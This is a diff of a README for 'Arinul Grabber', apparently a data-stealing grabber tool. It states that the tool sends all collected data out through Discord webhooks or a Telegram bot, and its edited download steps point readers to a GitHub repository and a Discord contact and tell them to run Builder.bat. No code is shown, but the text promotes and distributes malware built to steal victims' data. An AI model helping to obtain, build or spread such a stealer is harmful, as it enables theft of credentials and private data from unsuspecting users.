arinulee/Arinul-Grabber/README.md

 • Sends All Data Through Discord Webhooks/Telegram Bot.

 How to download;
-go to github or message arinul?#6883
-Download Arinul Grabber
-make sure you have python 3.10+ and that its added to path. open Builder.bat
+go to my official github; "https://github.com/arinulee/Arinul-Grabber" or message arinul?#6883 Download Arinul Grabber make sure you have python 3.10+ and that its added to path. open Builder.bat